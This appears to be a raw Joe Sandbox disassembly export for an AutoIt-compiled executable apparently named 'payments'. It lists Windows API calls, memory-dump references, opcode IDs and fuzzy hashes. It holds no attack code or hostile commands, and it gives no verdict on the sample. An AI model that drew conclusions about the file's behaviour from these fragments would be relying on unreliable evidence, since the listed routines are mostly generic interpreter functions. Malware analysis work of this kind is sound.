                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00CCEB0A
                                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00CCEB2B
                                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00CCEB45
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00CCEB4E
                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00CCEBB9
                                                                                                                          • GetDesktopWindow.USER32 ref: 00CCEBBF
                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00CCEBC6
                                                                                                                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00CCEC12
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00CCEC1F
                                                                                                                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00CCEC44
                                                                                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00CCEC6F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3869813825-2594219639
                                                                                                                          • Opcode ID: bfce4470267dfe82d254068a5b1fbc2bad9d0e4987290838472b5c5f160a759d
                                                                                                                          • Instruction ID: 81b279f380d8b3449b57538debf1260a5a4cfb474f56317a551712fc90428d6a
                                                                                                                          • Opcode Fuzzy Hash: bfce4470267dfe82d254068a5b1fbc2bad9d0e4987290838472b5c5f160a759d
                                                                                                                          • Instruction Fuzzy Hash: 6D513C71900709AFDB21DFA8CD89FAEBBF5FF05705F00492CE596A26A0CB74A945DB10
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Foreground
                                                                                                                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                          • API String ID: 62970417-1919597938
                                                                                                                          • Opcode ID: 3cc58fa5b930cab918d44788476a0ea5b3c2a255f01afa286e256137d21159a3
                                                                                                                          • Instruction ID: c21cafe93e001bd405c9390dc2e6b79018a4cf9f197f9fd8ab04213b20132adf
                                                                                                                          • Opcode Fuzzy Hash: 3cc58fa5b930cab918d44788476a0ea5b3c2a255f01afa286e256137d21159a3
                                                                                                                          • Instruction Fuzzy Hash: 71D1E630505342ABCB04EF60C489ABABBB0FF54354F544A1DF49A536E1DB30E99ADBE1
                                                                                                                          APIs
                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00CF6C56
                                                                                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00CF6D16
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BuffCharMessageSendUpper
                                                                                                                          • String ID: @U=u$DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                          • API String ID: 3974292440-1753161424
                                                                                                                          • Opcode ID: 3956092ce97f5e0256b11d70586b53ffdec60c19e6e37a8e65d3f72eac84a433
                                                                                                                          • Instruction ID: 727ca46efa038ab5ac643390114d2894db61b3aff0f956b416d6ad3826738546
                                                                                                                          • Opcode Fuzzy Hash: 3956092ce97f5e0256b11d70586b53ffdec60c19e6e37a8e65d3f72eac84a433
                                                                                                                          • Instruction Fuzzy Hash: 79A181302043459BCB54EF24C852B7AB3A5BF45358F10496DF9A65B3D2DB30ED05EB92
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00CFE754
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00CFE76B
                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00CFE776
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00CFE783
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00CFE78C
                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00CFE79B
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00CFE7A4
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00CFE7AB
                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00CFE7BC
                                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00D1D9BC,?), ref: 00CFE7D5
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00CFE7E5
                                                                                                                          • GetObjectW.GDI32(?,00000018,000000FF), ref: 00CFE809
                                                                                                                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00CFE834
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00CFE85C
                                                                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00CFE872
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3840717409-2594219639
                                                                                                                          • Opcode ID: ce86596c4b33a8864d53ab3a3c0e2bfb40706a1a47607f6040e36ec3fcedcebe
                                                                                                                          • Instruction ID: f864a54f5c474d083d744be1148fddad238e6d2c0bf3240742cf22cd1950f48b
                                                                                                                          • Opcode Fuzzy Hash: ce86596c4b33a8864d53ab3a3c0e2bfb40706a1a47607f6040e36ec3fcedcebe
                                                                                                                          • Instruction Fuzzy Hash: BF415A75600308FFDB119F65DC88EAA7BBAEF89711F108058F916D72A0CB309E42CB21
                                                                                                                          APIs
                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF3735
                                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00D2DC00,00000000,?,00000000,?,?), ref: 00CF37A3
                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00CF37EB
                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00CF3874
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00CF3B94
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00CF3BA1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$ConnectCreateRegistryValue
                                                                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                          • API String ID: 536824911-966354055
                                                                                                                          • Opcode ID: a0da0aeb68461b86e105f761db31e1badefe61f1a309175459485b7febb08af1
                                                                                                                          • Instruction ID: 5021d1e524257f84036edb2f596fafcf7049f25ac249d2bd31fb0a5a5dec7bfa
                                                                                                                          • Opcode Fuzzy Hash: a0da0aeb68461b86e105f761db31e1badefe61f1a309175459485b7febb08af1
                                                                                                                          • Instruction Fuzzy Hash: 11026F75204641AFCB14EF28C855A2EB7E5FF88720F04845DF95A9B3A1DB31EE01DB86
                                                                                                                          APIs
                                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00CCCF91
                                                                                                                          • __swprintf.LIBCMT ref: 00CCD032
                                                                                                                          • _wcscmp.LIBCMT ref: 00CCD045
                                                                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00CCD09A
                                                                                                                          • _wcscmp.LIBCMT ref: 00CCD0D6
                                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00CCD10D
                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 00CCD15F
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00CCD195
                                                                                                                          • GetParent.USER32(?), ref: 00CCD1B3
                                                                                                                          • ScreenToClient.USER32(00000000), ref: 00CCD1BA
                                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00CCD234
                                                                                                                          • _wcscmp.LIBCMT ref: 00CCD248
                                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00CCD26E
                                                                                                                          • _wcscmp.LIBCMT ref: 00CCD282
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                                          • String ID: %s%u
                                                                                                                          • API String ID: 3119225716-679674701
                                                                                                                          • Opcode ID: 2daa42a18840d3f132a118786fea4b71079a1b3f4475b9ba964d99ccc07d9f60
                                                                                                                          • Instruction ID: c3a940ecd9a022e8b97ef31f546de9f081b4420bcd3244aaa28855681a09f544
                                                                                                                          • Opcode Fuzzy Hash: 2daa42a18840d3f132a118786fea4b71079a1b3f4475b9ba964d99ccc07d9f60
                                                                                                                          • Instruction Fuzzy Hash: 38A18F71604306ABD715DF64C884FEAB7A9FF44354F04852DF9AAD2190DB30EE46CBA1
                                                                                                                          APIs
                                                                                                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 00CCD8EB
                                                                                                                          • _wcscmp.LIBCMT ref: 00CCD8FC
                                                                                                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 00CCD924
                                                                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 00CCD941
                                                                                                                          • _wcscmp.LIBCMT ref: 00CCD95F
                                                                                                                          • _wcsstr.LIBCMT ref: 00CCD970
                                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00CCD9A8
                                                                                                                          • _wcscmp.LIBCMT ref: 00CCD9B8
                                                                                                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 00CCD9DF
                                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00CCDA28
                                                                                                                          • _wcscmp.LIBCMT ref: 00CCDA38
                                                                                                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 00CCDA60
                                                                                                                          • GetWindowRect.USER32(00000004,?), ref: 00CCDAC9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                          • String ID: @$ThumbnailClass
                                                                                                                          • API String ID: 1788623398-1539354611
                                                                                                                          • Opcode ID: 62a78019bc67a3c7f47e839cd0299b7db36eb4785015be21c36f61e2bd62f802
                                                                                                                          • Instruction ID: 3e799f9114ba1f79facf0d1bff503144ed6d404f020bf636712b0bf95937412b
                                                                                                                          • Opcode Fuzzy Hash: 62a78019bc67a3c7f47e839cd0299b7db36eb4785015be21c36f61e2bd62f802
                                                                                                                          • Instruction Fuzzy Hash: 0D818F31008305ABDB15DF14C885FAA7BE8EF84714F14847EFD9A9A096DB30DE46DBA1
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00CFCEFB
                                                                                                                          • DestroyWindow.USER32(?,?), ref: 00CFCF73
                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00CFCFF4
                                                                                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00CFD016
                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CFD025
                                                                                                                          • DestroyWindow.USER32(?), ref: 00CFD042
                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C90000,00000000), ref: 00CFD075
                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CFD094
                                                                                                                          • GetDesktopWindow.USER32 ref: 00CFD0A9
                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00CFD0B0
                                                                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CFD0C2
                                                                                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00CFD0DA
                                                                                                                            • Part of subcall function 00CAB526: GetWindowLongW.USER32(?,000000EB), ref: 00CAB537
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                                                          • String ID: 0$@U=u$tooltips_class32
                                                                                                                          • API String ID: 3877571568-1130792468
                                                                                                                          • Opcode ID: 310a9e8984e21bfc5ea53b87594a0aea16d75d289124965a80e08ac1c3c0ceb4
                                                                                                                          • Instruction ID: 9e204fe8c1fd50392e28213176f57b71901ce50908496b14a923541dcf1c3393
                                                                                                                          • Opcode Fuzzy Hash: 310a9e8984e21bfc5ea53b87594a0aea16d75d289124965a80e08ac1c3c0ceb4
                                                                                                                          • Instruction Fuzzy Hash: 81719D75140309AFD720CF28CC85FB677E6EB88704F14491DFA96872A1DB70E946DB22
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAB34E: GetWindowLongW.USER32(?,000000EB), ref: 00CAB35F
                                                                                                                          • DragQueryPoint.SHELL32(?,?), ref: 00CFF37A
                                                                                                                            • Part of subcall function 00CFD7DE: ClientToScreen.USER32(?,?), ref: 00CFD807
                                                                                                                            • Part of subcall function 00CFD7DE: GetWindowRect.USER32(?,?), ref: 00CFD87D
                                                                                                                            • Part of subcall function 00CFD7DE: PtInRect.USER32(?,?,00CFED5A), ref: 00CFD88D
                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00CFF3E3
                                                                                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00CFF3EE
                                                                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00CFF411
                                                                                                                          • _wcscat.LIBCMT ref: 00CFF441
                                                                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00CFF458
                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00CFF471
                                                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00CFF488
                                                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00CFF4AA
                                                                                                                          • DragFinish.SHELL32(?), ref: 00CFF4B1
                                                                                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00CFF59C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u
                                                                                                                          • API String ID: 169749273-762882726
                                                                                                                          • Opcode ID: 4265af51325d50c53bbc5fbcb7e579e2f2d35c67120c5964a0f6a95b000fe2f5
                                                                                                                          • Instruction ID: 6a4c0bb16b83533927a2a6e4fc33d0f1347c9b0d17d7862867658523f53b887b
                                                                                                                          • Opcode Fuzzy Hash: 4265af51325d50c53bbc5fbcb7e579e2f2d35c67120c5964a0f6a95b000fe2f5
                                                                                                                          • Instruction Fuzzy Hash: 67615D71108305AFC711EF64CC85EAFBBF9EF89714F00491DF695922A1DB70960ADB62
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __wcsnicmp
                                                                                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                          • API String ID: 1038674560-1810252412
                                                                                                                          • Opcode ID: ca414d14eba312e7e36a0f7cbed93705db5b01c09fed8420027f721e827250d3
                                                                                                                          • Instruction ID: 2af50c59090ad7720fc19eb2c8d1b2f2bf5b5e39f942b5bdb70bb367af145f31
                                                                                                                          • Opcode Fuzzy Hash: ca414d14eba312e7e36a0f7cbed93705db5b01c09fed8420027f721e827250d3
                                                                                                                          • Instruction Fuzzy Hash: 18314C31A44209ABDF15EA60DD97FFEB3749F20714FA00139F452B10E9EB61AF09E661
                                                                                                                          APIs
                                                                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00CE79C6
                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00CE79D1
                                                                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00CE79DC
                                                                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00CE79E7
                                                                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00CE79F2
                                                                                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 00CE79FD
                                                                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00CE7A08
                                                                                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00CE7A13
                                                                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00CE7A1E
                                                                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00CE7A29
                                                                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00CE7A34
                                                                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00CE7A3F
                                                                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00CE7A4A
                                                                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 00CE7A55
                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00CE7A60
                                                                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00CE7A6B
                                                                                                                          • GetCursorInfo.USER32(?), ref: 00CE7A7B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Cursor$Load$Info
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2577412497-0
                                                                                                                          • Opcode ID: 82ce57cb47d4cb3aebc31ea5510af29d60169da360be7d72e658a20f6e4c8c7b
                                                                                                                          • Instruction ID: fccf73709226be071945efd1d9166fae0f83395385f11ff86f01ab774e81519b
                                                                                                                          • Opcode Fuzzy Hash: 82ce57cb47d4cb3aebc31ea5510af29d60169da360be7d72e658a20f6e4c8c7b
                                                                                                                          • Instruction Fuzzy Hash: C93113B0D0831A6ADB109FB69C8999FBFE8FF04754F50453AE50DE7280DA78A5008FA1
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00C9C8B7,?,00002000,?,?,00000000,?,00C9419E,?,?,?,00D2DC00), ref: 00CAE984
                                                                                                                            • Part of subcall function 00C9660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C953B1,?,?,00C961FF,?,00000000,00000001,00000000), ref: 00C9662F
                                                                                                                          • __wsplitpath.LIBCMT ref: 00C9C93E
                                                                                                                            • Part of subcall function 00CB1DFC: __wsplitpath_helper.LIBCMT ref: 00CB1E3C
                                                                                                                          • _wcscpy.LIBCMT ref: 00C9C953
                                                                                                                          • _wcscat.LIBCMT ref: 00C9C968
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00C9C978
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00C9CABE
                                                                                                                            • Part of subcall function 00C9B337: _wcscpy.LIBCMT ref: 00C9B36F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                          • API String ID: 2258743419-1018226102
